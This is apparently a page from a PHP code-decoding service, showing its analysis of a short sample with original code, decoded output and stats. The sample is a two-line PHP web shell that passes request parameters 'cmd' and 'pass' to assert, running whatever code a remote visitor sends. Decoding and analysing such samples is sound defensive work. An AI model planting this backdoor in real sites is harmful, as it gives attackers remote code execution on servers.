Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php call_user_func('assert',$_POST[cmd]); call_user_func_array('assert', array($_REQUEST..
Decoded Output download
<?php
call_user_func('assert',$_POST[cmd]);
call_user_func_array('assert', array($_REQUEST['pass']));
?>
Did this file decode correctly?
Original Code
<?php
call_user_func('assert',$_POST[cmd]);
call_user_func_array('assert', array($_REQUEST['pass']));
?>
Function Calls
None |
Stats
MD5 | 89332148326c84bfab576c114dd8b633 |
Eval Count | 0 |
Decode Time | 103 ms |